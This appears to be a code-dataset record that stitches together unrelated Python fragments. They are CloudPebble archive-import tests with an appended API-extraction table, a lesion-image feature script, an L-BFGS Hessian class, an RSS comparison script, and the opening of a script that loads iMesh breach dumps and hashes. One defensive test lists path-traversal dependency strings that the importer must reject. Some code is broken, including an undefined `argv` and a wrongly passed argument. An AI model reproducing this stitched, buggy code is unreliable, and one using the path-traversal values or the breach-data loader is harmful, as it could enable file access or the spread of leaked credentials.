'appinfo.json': make_appinfo(options=self.make_resource_spec())
})
do_import_archive(self.project_id, bundle)
project = Project.objects.get(pk=self.project_id)
self.assertEqual(project.resources.get().variants.get().get_contents(), 'contents!')
def test_import_package_with_resources(self):
""" Check that a resource can be imported in an package.json project """
bundle = build_bundle({
'src/main.c': '',
'resources/images/blah.png': 'contents!',
'package.json': make_package(pebble_options=self.make_resource_spec())
})
do_import_archive(self.project_id, bundle)
project = Project.objects.get(pk=self.project_id)
self.assertEqual(project.resources.get().variants.get().get_contents(), 'contents!')
def test_throws_with_local_file_dependencies(self):
""" Throw if any dependencies reference local files """
bad_versions = [
'file:security/breach',
'/security/breach',
'./security/breach',
'../security/breach',
'~/security/breach'
]
for version in bad_versions:
bundle = build_bundle({
'src/main.c': '',
'package.json': make_package(package_options={
'dependencies': {'some_package': version}
})
})
with self.assertRaises(ValidationError):
do_import_archive(self.project_id, bundle)
def test_throws_if_sdk2_project_has_array_appkeys(self):
""" Throw when trying to import an sdk 2 project with array appkeys """
bundle = build_bundle({
'src/main.c': '',
'appinfo.json': make_appinfo(options={'appKeys': [], 'sdkVersion': '2'})
})
with self.assertRaises(ValidationError):
do_import_archive(self.project_id, bundle)
def test_invalid_resource_id(self):
""" Check that invalid characters are banned from resource IDs """
bundle = build_bundle({
'src/main.c': '',
'resources/images/blah.png': 'contents!',
'package.json': make_package(pebble_options=self.make_resource_spec("<>"))
})
with self.assertRaises(ValidationError):
do_import_archive(self.project_id, bundle)
def test_import_json_file(self):
""" Check that json files are correctly imported """
bundle = build_bundle({
'src/js/test.json': '{}',
'src/main.c': '',
'package.json': make_package()
})
do_import_archive(self.project_id, bundle)
project = Project.objects.get(pk=self.project_id)
self.assertEqual(project.source_files.filter(file_name='test.json').count(), 1)
def test_import_rocky(self):
""" Check that json files are correctly imported """
bundle = build_bundle({
'src/rocky/index.js': '',
'src/common/lib.js': '',
'src/pkjs/app.js': '',
'package.json': make_package(pebble_options={'projectType': 'rocky'})
})
do_import_archive(self.project_id, bundle)
project = Project.objects.get(pk=self.project_id)
self.assertEqual(project.source_files.filter(file_name='index.js', target='app').count(), 1)
self.assertEqual(project.source_files.filter(file_name='lib.js', target='common').count(), 1)
self.assertEqual(project.source_files.filter(file_name='app.js', target='pkjs').count(), 1)
@mock.patch('ide.models.s3file.s3', fake_s3)
class TestImportLibrary(CloudpebbleTestCase):
    """Archive-import tests for projects of type 'package' (libraries)."""

    def setUp(self):
        self.login(type='package')

    def test_import_basic_library(self):
        """A simple library archive should import with the expected file targets."""
        archive = build_bundle({
            'include/my-lib.h': '',
            'package.json': make_package(pebble_options={'projectType': 'package'}),
            'src/c/my-lib.c': '',
            'src/c/my-priv.h': '',
        })
        do_import_archive(self.project_id, archive)
        imported = Project.objects.get(pk=self.project_id)
        by_name = {source.file_name: source for source in imported.source_files.all()}
        self.assertSetEqual(set(by_name.keys()), {'my-lib.h', 'my-lib.c', 'my-priv.h'})
        # The exported header is public; everything else builds as app code.
        self.assertEqual(by_name['my-lib.h'].target, 'public')
        self.assertEqual(by_name['my-lib.c'].target, 'app')
        self.assertEqual(by_name['my-priv.h'].target, 'app')

    def test_import_library_with_resources(self):
        """Library resources declared in package.json should be imported."""
        media = [{
            'type': 'bitmap',
            'name': 'MY_RES1',
            'file': 'res1.png'
        }, {
            'type': 'bitmap',
            'name': 'MY_RES2',
            'file': 'res2.png'
        }]
        archive = build_bundle({
            'package.json': make_package(pebble_options={
                'projectType': 'package',
                'resources': {'media': media}
            }),
            'src/resources/res1.png': '',
            'src/resources/res2.png': '',
        })
        do_import_archive(self.project_id, archive)
        imported = Project.objects.get(pk=self.project_id)
        self.assertSetEqual({resource.file_name for resource in imported.resources.all()}, {'res1.png', 'res2.png'})
| [
"ide.tasks.archive.do_import_archive",
"mock.patch",
"utils.fakes.FakeS3",
"ide.utils.cloudpebble_test.make_package",
"ide.models.project.Project.objects.get",
"ide.utils.cloudpebble_test.make_appinfo"
] | [((447, 455), 'utils.fakes.FakeS3', 'FakeS3', ([], {}), '()\n', (453, 455), False, 'from utils.fakes import FakeS3\n'), ((459, 502), 'mock.patch', 'mock.patch', (['"""ide.models.s3file.s3"""', 'fake_s3'], {}), "('ide.models.s3file.s3', fake_s3)\n", (469, 502), False, 'import mock\n'), ((7304, 7347), 'mock.patch', 'mock.patch', (['"""ide.models.s3file.s3"""', 'fake_s3'], {}), "('ide.models.s3file.s3', fake_s3)\n", (7314, 7347), False, 'import mock\n'), ((1134, 1176), 'ide.tasks.archive.do_import_archive', 'do_import_archive', (['self.project_id', 'bundle'], {}), '(self.project_id, bundle)\n', (1151, 1176), False, 'from ide.tasks.archive import do_import_archive, InvalidProjectArchiveException\n'), ((2035, 2077), 'ide.tasks.archive.do_import_archive', 'do_import_archive', (['self.project_id', 'bundle'], {}), '(self.project_id, bundle)\n', (2052, 2077), False, 'from ide.tasks.archive import do_import_archive, InvalidProjectArchiveException\n'), ((2096, 2135), 'ide.models.project.Project.objects.get', 'Project.objects.get', ([], {'pk': 'self.project_id'}), '(pk=self.project_id)\n', (2115, 2135), False, 'from ide.models.project import Project\n'), ((2714, 2756), 'ide.tasks.archive.do_import_archive', 'do_import_archive', (['self.project_id', 'bundle'], {}), '(self.project_id, bundle)\n', (2731, 2756), False, 'from ide.tasks.archive import do_import_archive, InvalidProjectArchiveException\n'), ((2775, 2814), 'ide.models.project.Project.objects.get', 'Project.objects.get', ([], {'pk': 'self.project_id'}), '(pk=self.project_id)\n', (2794, 2814), False, 'from ide.models.project import Project\n'), ((3324, 3366), 'ide.tasks.archive.do_import_archive', 'do_import_archive', (['self.project_id', 'bundle'], {}), '(self.project_id, bundle)\n', (3341, 3366), False, 'from ide.tasks.archive import do_import_archive, InvalidProjectArchiveException\n'), ((3385, 3424), 'ide.models.project.Project.objects.get', 'Project.objects.get', ([], {'pk': 'self.project_id'}), 
'(pk=self.project_id)\n', (3404, 3424), False, 'from ide.models.project import Project\n'), ((3831, 3873), 'ide.tasks.archive.do_import_archive', 'do_import_archive', (['self.project_id', 'bundle'], {}), '(self.project_id, bundle)\n', (3848, 3873), False, 'from ide.tasks.archive import do_import_archive, InvalidProjectArchiveException\n'), ((3892, 3931), 'ide.models.project.Project.objects.get', 'Project.objects.get', ([], {'pk': 'self.project_id'}), '(pk=self.project_id)\n', (3911, 3931), False, 'from ide.models.project import Project\n'), ((4375, 4417), 'ide.tasks.archive.do_import_archive', 'do_import_archive', (['self.project_id', 'bundle'], {}), '(self.project_id, bundle)\n', (4392, 4417), False, 'from ide.tasks.archive import do_import_archive, InvalidProjectArchiveException\n'), ((4436, 4475), 'ide.models.project.Project.objects.get', 'Project.objects.get', ([], {'pk': 'self.project_id'}), '(pk=self.project_id)\n', (4455, 4475), False, 'from ide.models.project import Project\n'), ((6370, 6412), 'ide.tasks.archive.do_import_archive', 'do_import_archive', (['self.project_id', 'bundle'], {}), '(self.project_id, bundle)\n', (6387, 6412), False, 'from ide.tasks.archive import do_import_archive, InvalidProjectArchiveException\n'), ((6431, 6470), 'ide.models.project.Project.objects.get', 'Project.objects.get', ([], {'pk': 'self.project_id'}), '(pk=self.project_id)\n', (6450, 6470), False, 'from ide.models.project import Project\n'), ((6897, 6939), 'ide.tasks.archive.do_import_archive', 'do_import_archive', (['self.project_id', 'bundle'], {}), '(self.project_id, bundle)\n', (6914, 6939), False, 'from ide.tasks.archive import do_import_archive, InvalidProjectArchiveException\n'), ((6958, 6997), 'ide.models.project.Project.objects.get', 'Project.objects.get', ([], {'pk': 'self.project_id'}), '(pk=self.project_id)\n', (6977, 6997), False, 'from ide.models.project import Project\n'), ((7779, 7821), 'ide.tasks.archive.do_import_archive', 'do_import_archive', 
(['self.project_id', 'bundle'], {}), '(self.project_id, bundle)\n', (7796, 7821), False, 'from ide.tasks.archive import do_import_archive, InvalidProjectArchiveException\n'), ((7840, 7879), 'ide.models.project.Project.objects.get', 'Project.objects.get', ([], {'pk': 'self.project_id'}), '(pk=self.project_id)\n', (7859, 7879), False, 'from ide.models.project import Project\n'), ((8891, 8933), 'ide.tasks.archive.do_import_archive', 'do_import_archive', (['self.project_id', 'bundle'], {}), '(self.project_id, bundle)\n', (8908, 8933), False, 'from ide.tasks.archive import do_import_archive, InvalidProjectArchiveException\n'), ((8952, 8991), 'ide.models.project.Project.objects.get', 'Project.objects.get', ([], {'pk': 'self.project_id'}), '(pk=self.project_id)\n', (8971, 8991), False, 'from ide.models.project import Project\n'), ((5631, 5673), 'ide.tasks.archive.do_import_archive', 'do_import_archive', (['self.project_id', 'bundle'], {}), '(self.project_id, bundle)\n', (5648, 5673), False, 'from ide.tasks.archive import do_import_archive, InvalidProjectArchiveException\n'), ((6066, 6108), 'ide.tasks.archive.do_import_archive', 'do_import_archive', (['self.project_id', 'bundle'], {}), '(self.project_id, bundle)\n', (6083, 6108), False, 'from ide.tasks.archive import do_import_archive, InvalidProjectArchiveException\n'), ((1100, 1114), 'ide.utils.cloudpebble_test.make_appinfo', 'make_appinfo', ([], {}), '()\n', (1112, 1114), False, 'from ide.utils.cloudpebble_test import CloudpebbleTestCase, make_package, make_appinfo, build_bundle, override_settings\n'), ((1702, 1744), 'ide.tasks.archive.do_import_archive', 'do_import_archive', (['self.project_id', 'bundle'], {}), '(self.project_id, bundle)\n', (1719, 1744), False, 'from ide.tasks.archive import do_import_archive, InvalidProjectArchiveException\n'), ((1964, 2015), 'ide.utils.cloudpebble_test.make_package', 'make_package', ([], {'package_options': "{'name': 'myproject'}"}), "(package_options={'name': 'myproject'})\n", 
(1976, 2015), False, 'from ide.utils.cloudpebble_test import CloudpebbleTestCase, make_package, make_appinfo, build_bundle, override_settings\n'), ((2612, 2664), 'ide.utils.cloudpebble_test.make_package', 'make_package', ([], {'package_options': "{'dependencies': deps}"}), "(package_options={'dependencies': deps})\n", (2624, 2664), False, 'from ide.utils.cloudpebble_test import CloudpebbleTestCase, make_package, make_appinfo, build_bundle, override_settings\n'), ((3222, 3274), 'ide.utils.cloudpebble_test.make_package', 'make_package', ([], {'package_options': "{'keywords': keywords}"}), "(package_options={'keywords': keywords})\n", (3234, 3274), False, 'from ide.utils.cloudpebble_test import CloudpebbleTestCase, make_package, make_appinfo, build_bundle, override_settings\n'), ((5227, 5269), 'ide.tasks.archive.do_import_archive', 'do_import_archive', (['self.project_id', 'bundle'], {}), '(self.project_id, bundle)\n', (5244, 5269), False, 'from ide.tasks.archive import do_import_archive, InvalidProjectArchiveException\n'), ((5502, 5558), 'ide.utils.cloudpebble_test.make_appinfo', 'make_appinfo', ([], {'options': "{'appKeys': [], 'sdkVersion': '2'}"}), "(options={'appKeys': [], 'sdkVersion': '2'})\n", (5514, 5558), False, 'from ide.utils.cloudpebble_test import CloudpebbleTestCase, make_package, make_appinfo, build_bundle, override_settings\n'), ((6336, 6350), 'ide.utils.cloudpebble_test.make_package', 'make_package', ([], {}), '()\n', (6348, 6350), False, 'from ide.utils.cloudpebble_test import CloudpebbleTestCase, make_package, make_appinfo, build_bundle, override_settings\n'), ((6824, 6877), 'ide.utils.cloudpebble_test.make_package', 'make_package', ([], {'pebble_options': "{'projectType': 'rocky'}"}), "(pebble_options={'projectType': 'rocky'})\n", (6836, 6877), False, 'from ide.utils.cloudpebble_test import CloudpebbleTestCase, make_package, make_appinfo, build_bundle, override_settings\n'), ((7634, 7689), 'ide.utils.cloudpebble_test.make_package', 'make_package', 
([], {'pebble_options': "{'projectType': 'package'}"}), "(pebble_options={'projectType': 'package'})\n", (7646, 7689), False, 'from ide.utils.cloudpebble_test import CloudpebbleTestCase, make_package, make_appinfo, build_bundle, override_settings\n'), ((8385, 8594), 'ide.utils.cloudpebble_test.make_package', 'make_package', ([], {'pebble_options': "{'projectType': 'package', 'resources': {'media': [{'type': 'bitmap',\n 'name': 'MY_RES1', 'file': 'res1.png'}, {'type': 'bitmap', 'name':\n 'MY_RES2', 'file': 'res2.png'}]}}"}), "(pebble_options={'projectType': 'package', 'resources': {\n 'media': [{'type': 'bitmap', 'name': 'MY_RES1', 'file': 'res1.png'}, {\n 'type': 'bitmap', 'name': 'MY_RES2', 'file': 'res2.png'}]}})\n", (8397, 8594), False, 'from ide.utils.cloudpebble_test import CloudpebbleTestCase, make_package, make_appinfo, build_bundle, override_settings\n'), ((1597, 1617), 'ide.utils.cloudpebble_test.make_appinfo', 'make_appinfo', (['{k: v}'], {}), '({k: v})\n', (1609, 1617), False, 'from ide.utils.cloudpebble_test import CloudpebbleTestCase, make_package, make_appinfo, build_bundle, override_settings\n'), ((5031, 5104), 'ide.utils.cloudpebble_test.make_package', 'make_package', ([], {'package_options': "{'dependencies': {'some_package': version}}"}), "(package_options={'dependencies': {'some_package': version}})\n", (5043, 5104), False, 'from ide.utils.cloudpebble_test import CloudpebbleTestCase, make_package, make_appinfo, build_bundle, override_settings\n')] |
# -*- coding: utf-8 -*-
import click
import os
import logging
import sys
import pandas as pd
import os, sys, inspect
# Make the three helper-module directories (which live next to this script)
# importable, each at most once. This replaces three copy-pasted stanzas;
# the append order and the final value of ``cmd_subfolder`` are unchanged.
for _subdir in ("images_in_features_subdirs", "non_duplicate_lesion_id",
                "training_and_validation_sets"):
    cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(
        os.path.split(inspect.getfile(inspect.currentframe()))[0], _subdir)))
    if cmd_subfolder not in sys.path:
        sys.path.append(cmd_subfolder)
from images_in_features_subdirs import images_in_features_subdirs
from non_duplicate_lesion_id import non_duplicate_lesion_id
from training_and_validation_sets import training_and_validation_sets
def build_features(**kwargs):
    """
    Takes data in ../data/interim. Splits training and validation data.
    Stores splitted sets in ../data/processed/base_dir/train_dir
    and ../data/processed/base_dir/val_dir

    Note: this text was previously a bare string expression placed after the
    first statements (and therefore discarded at runtime); it is now a real
    docstring.

    Expected keyword arguments:
        metadata_csv: path to the metadata CSV describing the data set
        images_dir:   directory holding the source images
        train_dir:    output directory for the training split
        val_dir:      output directory for the validation split
    """
    metadata_csv = kwargs['metadata_csv']
    train_dir = kwargs['train_dir']
    images_dir = kwargs['images_dir']
    val_dir = kwargs['val_dir']
    # Load the meta-data set.
    df = pd.read_csv(metadata_csv)
    # Create the non_duplicate column and build a frame of unique lesion ids.
    df, df_unique_id = non_duplicate_lesion_id(df)
    # Split into training and validation dataframes.
    df, df_train, df_val = training_and_validation_sets(df, df_unique_id)
    # Place images in named attribute (feature) subdirectories.
    images_in_features_subdirs(df,
                               images_dir=images_dir,
                               train_dir=train_dir,
                               val_dir=val_dir)
    logger = logging.getLogger(__name__)
    logger.info('Features added. Data is ready for modelling.')
if __name__ == '__main__':
    import json
    log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
    logging.basicConfig(level=logging.INFO, format=log_fmt)
    # Bug fix: ``argv`` was an undefined name (NameError); the JSON payload
    # arrives in sys.argv[1] (``sys`` is imported at the top of the file).
    data = json.loads(sys.argv[1])
    # Bug fix: build_features accepts keyword arguments only, so the parsed
    # dict must be unpacked rather than passed positionally.
    build_features(**data)
"logging.getLogger",
"logging.basicConfig",
"json.loads",
"images_in_features_subdirs.images_in_features_subdirs",
"pandas.read_csv",
"inspect.currentframe",
"training_and_validation_sets.training_and_validation_sets",
"sys.path.append",
"non_duplicate_lesion_id.non_duplicate_lesion_id"
] | [((312, 342), 'sys.path.append', 'sys.path.append', (['cmd_subfolder'], {}), '(cmd_subfolder)\n', (327, 342), False, 'import os, sys, inspect\n'), ((542, 572), 'sys.path.append', 'sys.path.append', (['cmd_subfolder'], {}), '(cmd_subfolder)\n', (557, 572), False, 'import os, sys, inspect\n'), ((777, 807), 'sys.path.append', 'sys.path.append', (['cmd_subfolder'], {}), '(cmd_subfolder)\n', (792, 807), False, 'import os, sys, inspect\n'), ((1477, 1502), 'pandas.read_csv', 'pd.read_csv', (['metadata_csv'], {}), '(metadata_csv)\n', (1488, 1502), True, 'import pandas as pd\n'), ((1607, 1634), 'non_duplicate_lesion_id.non_duplicate_lesion_id', 'non_duplicate_lesion_id', (['df'], {}), '(df)\n', (1630, 1634), False, 'from non_duplicate_lesion_id import non_duplicate_lesion_id\n'), ((1716, 1762), 'training_and_validation_sets.training_and_validation_sets', 'training_and_validation_sets', (['df', 'df_unique_id'], {}), '(df, df_unique_id)\n', (1744, 1762), False, 'from training_and_validation_sets import training_and_validation_sets\n'), ((1827, 1922), 'images_in_features_subdirs.images_in_features_subdirs', 'images_in_features_subdirs', (['df'], {'images_dir': 'images_dir', 'train_dir': 'train_dir', 'val_dir': 'val_dir'}), '(df, images_dir=images_dir, train_dir=train_dir,\n val_dir=val_dir)\n', (1853, 1922), False, 'from images_in_features_subdirs import images_in_features_subdirs\n'), ((2079, 2106), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (2096, 2106), False, 'import logging\n'), ((2304, 2359), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO', 'format': 'log_fmt'}), '(level=logging.INFO, format=log_fmt)\n', (2323, 2359), False, 'import logging\n'), ((2374, 2393), 'json.loads', 'json.loads', (['argv[1]'], {}), '(argv[1])\n', (2384, 2393), False, 'import json\n'), ((212, 234), 'inspect.currentframe', 'inspect.currentframe', ([], {}), '()\n', (232, 234), False, 'import os, sys, inspect\n'), ((445, 467), 
'inspect.currentframe', 'inspect.currentframe', ([], {}), '()\n', (465, 467), False, 'import os, sys, inspect\n'), ((675, 697), 'inspect.currentframe', 'inspect.currentframe', ([], {}), '()\n', (695, 697), False, 'import os, sys, inspect\n')] |
from __future__ import print_function
import numpy as np
import os
class BFGS_Hessian(object):
    """
    Class to evaluate the update to inverse Hessian matrix in the L-BFGS scheme.
    (see wikipedia article if nothing else).
    H is B^-1 form that article.
    B_k+1 = B + yy^t / (y^ts) - B s s^t B / (s^t Bk s)) (all k on the RHS)
    H_k+1 = (1 - sy^t / (y^t s) ) H (1 - ys^t / (y^ts))) + ss^t / (y^t s).
    Determinant of B:
    ln det Bk+1 = ln det Bk + ln( s^ty / s^t B s).
    For quasi Newton, s_k = x_k1 - x_k = - alpha_k Hk grad_k with alpha_k newton step-length.
    --> s^t B s at k is alpha_k^2 g_k H g_k
    s^t y is - alpha_k (g_k+1 - g_k) H g_k
    This leads to ln|B_k + 1| = ln |B_k| + ln(1 - 1/alpha_k g_k+1 H g_k / (gk H gk))

    The (y, s) pair vectors are kept on disk (memory-mapped npy files) rather
    than in memory; only their paths are stored on the instance.
    """
    def __init__(self, lib_dir, apply_H0k, paths2ys, paths2ss, L=100000, apply_B0k=None, verbose=True):
        """
        :param lib_dir: directory used to stash the temporary alpha scalars
            produced between the two loops of the two-loop recursion.
        :param apply_H0k: user supplied function(x,k), applying a zeroth order estimate of the inverse Hessian to x at
        iter k.
        :param paths2ys: dictionary of paths to the y vectors. y_k = grad_k+1 - grad_k
        :param paths2ss: dictionary of paths to the s vectors. s_k = x_k+1 - xk_k
        :param L: memory length; only the most recent L (s, y) pairs enter the
            recursions.
        :param apply_B0k: optional function(x,k) applying the zeroth order (direct)
            Hessian estimate; required only by get_gk / get_sBs / get_lndet_update.
        :param verbose: if True, print a note whenever a (y, s) pair is linked in.
        :return:
        H is inverse Hessian, not Hessian.
        """
        self.lib_dir = lib_dir
        self.paths2ys = paths2ys
        self.paths2ss = paths2ss
        self.L = L
        self.applyH0k = apply_H0k
        self.applyB0k = apply_B0k
        self.verbose = verbose
    def y(self, n):
        # Memory-mapped load of y_n = grad_{n+1} - grad_n (not read fully into RAM).
        return np.load(self.paths2ys[n], mmap_mode='r')
    def s(self, n):
        # Memory-mapped load of s_n = x_{n+1} - x_n.
        return np.load(self.paths2ss[n], mmap_mode='r')
    def add_ys(self, path2y, path2s, k):
        # Register the (y_k, s_k) pair by file path; both files must already exist.
        assert os.path.exists(path2y), path2y
        assert os.path.exists(path2s), path2s
        self.paths2ys[k] = path2y
        self.paths2ss[k] = path2s
        if self.verbose:
            print('Linked y vector ', path2y, ' to Hessian')
            print('Linked s vector ', path2s, ' to Hessian')
    def _save_alpha(self, alpha, i):
        # Stash the first-loop coefficient alpha_i on disk; it is reloaded
        # (and deleted) by _load_alpha in the second loop of get_mHkgk.
        fname = os.path.join(self.lib_dir, 'temp_alpha_%s.npy' % i)
        np.save(fname, alpha)
        return
    def _load_alpha(self, i):
        """
        Loads, and removes, the temporary alpha_i scalar from disk.
        :param i: pair index whose alpha coefficient is wanted.
        :return: the stored alpha_i value.
        """
        fname = os.path.join(self.lib_dir, 'temp_alpha_%s.npy' % i)
        assert os.path.exists(fname)
        ret = np.load(fname)
        os.remove(fname)
        return ret
    def applyH(self, x, k, _depth=0):
        """
        Recursive calculation of H_k x, for any x.
        This uses the product form update H_new = (1 - rho s y^t) H (1 - rho y s^t) + rho ss^t
        :param x: vector to apply the inverse Hessian to
        :param k: iter level. Output is H_k x.
        :param _depth : internal, for internal bookkeeping.
        :return:
        """
        # Base cases: before the first update, past the memory length, or memoryless.
        if k <= 0 or _depth >= self.L or self.L == 0: return self.applyH0k(x, k)
        s = self.s(k - 1)
        y = self.y(k - 1)
        rho = 1. / np.sum(s * y)
        Hv = self.applyH(x - rho * y * np.sum(x * s), k - 1, _depth=_depth + 1)
        return Hv - s * (rho * np.sum(y * Hv)) + rho * s * np.sum(s * x)
    def get_gk(self, k, alpha_k0):
        """
        Reconstruct gradient at xk, given the first newton step length at step max(0,k-L)
        ! this is very badly behaved numerically.
        """
        assert self.applyB0k is not None
        # Seed with -B0 s_{k-L} / alpha_{k-L}, then telescope with the stored y's.
        ret = -self.applyB0k(self.s(max(0, k - self.L)),max(0,k-self.L)) / alpha_k0
        for j in range(max(0, k - self.L), k):
            ret += self.y(j)
        return ret
    def get_sBs(self, k, alpha_k, alpha_k0):
        """
        Reconstruct s^Bs at x_k, given the first newton step length at step max(0,k-L) and current step alpha_k.
        """
        return - alpha_k * np.sum(self.s(k) * self.get_gk(k, alpha_k0))
    def get_lndet_update(self, k, alpha_k, alpha_k0):
        """
        Return update to B log determinant, lndet B_k+1 = lndet B_k + output.
        """
        return np.log(np.sum(self.y(k) * self.s(k)) / self.get_sBs(k, alpha_k, alpha_k0))
    def get_mHkgk(self, gk, k, output_fname=None):
        """
        Obtains - H_k g_k with L-BFGS two-loop recursion.
        :param gk: grad f(x_k)
        :param k: iterate index
        :return: - H_k g_k according to L-BFGS.
        If output_fname is set then output is saved in file and nothing is returned.
        Should be fine with k == 0
        """
        q = gk.copy()
        rho = lambda i: 1. / np.sum(self.s(i) * self.y(i))
        # First loop: newest to oldest pair, peeling off the alpha_i coefficients.
        for i in range(k - 1, np.max([-1, k - self.L - 1]), -1):
            alpha_i = rho(i) * np.sum(self.s(i) * q)
            q -= alpha_i * self.y(i)
            self._save_alpha(alpha_i, i)
        r = self.applyH0k(q, k)
        # Second loop: oldest to newest pair, re-applying the stored alphas.
        for i in range(np.max([0, k - self.L]), k):
            beta = rho(i) * np.sum(self.y(i) * r)
            r += self.s(i) * (self._load_alpha(i) - beta)
        if output_fname is None: return -r
        np.save(output_fname, -r)
        return
    def sample_Gaussian(self, k, x_0, rng_state=None):
        """
        sample from a MV zero-mean Gaussian with covariance matrix H, at iteration level k,
        given input x_0 random vector with covariance H_0.
        Since H is the inverse Hessian, then H is roughly the covariance matrix of the parameters in a line search.
        :param k: iteration level of the Hessian approximation to sample from.
        :param x_0: input random vector, assumed drawn with covariance H_0.
        :param rng_state: optional numpy RNG state to restore before drawing.
        :return: the transformed sample vector.
        """
        ret = x_0.copy()
        rho = lambda i: 1. / np.sum(self.s(i) * self.y(i))
        if rng_state is not None: np.random.set_state(rng_state)
        eps = np.random.standard_normal((len(range(np.max([0, k - self.L]), k)), 1))
        for idx, i in enumerate(range(np.max([0, k - self.L]), k)):
            ret = ret - self.s(i) * np.sum(self.y(i) * ret) * rho(i) + np.sqrt(rho(i)) * self.s(i) * eps[idx]
        return ret
| [
"os.path.exists",
"numpy.random.set_state",
"os.path.join",
"numpy.max",
"numpy.sum",
"numpy.load",
"numpy.save",
"os.remove"
] | [((1529, 1569), 'numpy.load', 'np.load', (['self.paths2ys[n]'], {'mmap_mode': '"""r"""'}), "(self.paths2ys[n], mmap_mode='r')\n", (1536, 1569), True, 'import numpy as np\n'), ((1606, 1646), 'numpy.load', 'np.load', (['self.paths2ss[n]'], {'mmap_mode': '"""r"""'}), "(self.paths2ss[n], mmap_mode='r')\n", (1613, 1646), True, 'import numpy as np\n'), ((1704, 1726), 'os.path.exists', 'os.path.exists', (['path2y'], {}), '(path2y)\n', (1718, 1726), False, 'import os\n'), ((1750, 1772), 'os.path.exists', 'os.path.exists', (['path2s'], {}), '(path2s)\n', (1764, 1772), False, 'import os\n'), ((2050, 2101), 'os.path.join', 'os.path.join', (['self.lib_dir', "('temp_alpha_%s.npy' % i)"], {}), "(self.lib_dir, 'temp_alpha_%s.npy' % i)\n", (2062, 2101), False, 'import os\n'), ((2110, 2131), 'numpy.save', 'np.save', (['fname', 'alpha'], {}), '(fname, alpha)\n', (2117, 2131), True, 'import numpy as np\n'), ((2297, 2348), 'os.path.join', 'os.path.join', (['self.lib_dir', "('temp_alpha_%s.npy' % i)"], {}), "(self.lib_dir, 'temp_alpha_%s.npy' % i)\n", (2309, 2348), False, 'import os\n'), ((2364, 2385), 'os.path.exists', 'os.path.exists', (['fname'], {}), '(fname)\n', (2378, 2385), False, 'import os\n'), ((2400, 2414), 'numpy.load', 'np.load', (['fname'], {}), '(fname)\n', (2407, 2414), True, 'import numpy as np\n'), ((2423, 2439), 'os.remove', 'os.remove', (['fname'], {}), '(fname)\n', (2432, 2439), False, 'import os\n'), ((4976, 5001), 'numpy.save', 'np.save', (['output_fname', '(-r)'], {}), '(output_fname, -r)\n', (4983, 5001), True, 'import numpy as np\n'), ((3001, 3014), 'numpy.sum', 'np.sum', (['(s * y)'], {}), '(s * y)\n', (3007, 3014), True, 'import numpy as np\n'), ((4566, 4594), 'numpy.max', 'np.max', (['[-1, k - self.L - 1]'], {}), '([-1, k - self.L - 1])\n', (4572, 4594), True, 'import numpy as np\n'), ((4788, 4811), 'numpy.max', 'np.max', (['[0, k - self.L]'], {}), '([0, k - self.L])\n', (4794, 4811), True, 'import numpy as np\n'), ((5537, 5567), 
'numpy.random.set_state', 'np.random.set_state', (['rng_state'], {}), '(rng_state)\n', (5556, 5567), True, 'import numpy as np\n'), ((3154, 3167), 'numpy.sum', 'np.sum', (['(s * x)'], {}), '(s * x)\n', (3160, 3167), True, 'import numpy as np\n'), ((5692, 5715), 'numpy.max', 'np.max', (['[0, k - self.L]'], {}), '([0, k - self.L])\n', (5698, 5715), True, 'import numpy as np\n'), ((3054, 3067), 'numpy.sum', 'np.sum', (['(x * s)'], {}), '(x * s)\n', (3060, 3067), True, 'import numpy as np\n'), ((3126, 3140), 'numpy.sum', 'np.sum', (['(y * Hv)'], {}), '(y * Hv)\n', (3132, 3140), True, 'import numpy as np\n'), ((5619, 5642), 'numpy.max', 'np.max', (['[0, k - self.L]'], {}), '([0, k - self.L])\n', (5625, 5642), True, 'import numpy as np\n')] |
import feedparser
import difflib
import json

# Separator printed between the two feed dumps (kept byte-identical).
divider = "\n\n################################################\n\n"

# Fetch and dump both top-stories feeds.
cbc_feed = feedparser.parse("http://rss.cbc.ca/lineup/topstories.xml")
print(json.dumps(cbc_feed))
print(divider)

cnn_feed = feedparser.parse("http://rss.cnn.com/rss/cnn_topstories.rss")
print(json.dumps(cnn_feed))
print(divider)

# Pair every CNN headline with its closest CBC headline (at most one match,
# with a very permissive similarity cutoff).
cbc_titles = [entry['title'] for entry in cbc_feed.get('entries')]
cnn_titles = [entry['title'] for entry in cnn_feed.get('entries')]
res = [
    (headline, difflib.get_close_matches(headline, cbc_titles, 1, 0.01))
    for headline in cnn_titles
]
print(json.dumps(res))
| [
"feedparser.parse",
"json.dumps",
"difflib.get_close_matches"
] | [((51, 110), 'feedparser.parse', 'feedparser.parse', (['"""http://rss.cbc.ca/lineup/topstories.xml"""'], {}), "('http://rss.cbc.ca/lineup/topstories.xml')\n", (67, 110), False, 'import feedparser\n'), ((206, 267), 'feedparser.parse', 'feedparser.parse', (['"""http://rss.cnn.com/rss/cnn_topstories.rss"""'], {}), "('http://rss.cnn.com/rss/cnn_topstories.rss')\n", (222, 267), False, 'import feedparser\n'), ((117, 132), 'json.dumps', 'json.dumps', (['cbc'], {}), '(cbc)\n', (127, 132), False, 'import json\n'), ((274, 289), 'json.dumps', 'json.dumps', (['cnn'], {}), '(cnn)\n', (284, 289), False, 'import json\n'), ((562, 577), 'json.dumps', 'json.dumps', (['res'], {}), '(res)\n', (572, 577), False, 'import json\n'), ((475, 524), 'difflib.get_close_matches', 'difflib.get_close_matches', (['x', 'cbc_titles', '(1)', '(0.01)'], {}), '(x, cbc_titles, 1, 0.01)\n', (500, 524), False, 'import difflib\n')] |
"""
Usage Example:
cat imesh_sample.txt | python dump_to_json.py -o imesh.json -e imesh_hashes.json
"""
import sys
import json
import argparse
import traceback
from os.path import dirname, abspath
project_folder = dirname(dirname(abspath('.')))
if project_folder not in sys.path:
sys.path.append(project_folder)
from breaches.lib.data_record import ValidationError
def eprint(*args, **kwargs): # pylint: disable=w0621
    """Forward *args* to print(), writing to stderr instead of stdout."""
    print(*args, file=sys.stderr, **kwargs)
if '__main__' == __name__:
    parser = argparse.ArgumentParser()
    parser.add_argument("-o", "--output_filename", help="File to write json data info for breaches index")
    parser.add_argument("-e", "--hash_filename",
                        help="File to write json data info for hashes index")
    args = parser.parse_args()
    if args.output_filename is None:
        parser.print_help()
        sys.exit(1)
    # Make the package root importable before pulling in the importer.
    package_base = dirname(dirname(dirname(abspath(__file__))))
    if package_base not in sys.path:
        sys.path.insert(0, package_base)
    from breaches.imesh.imesh import ImeshImporter
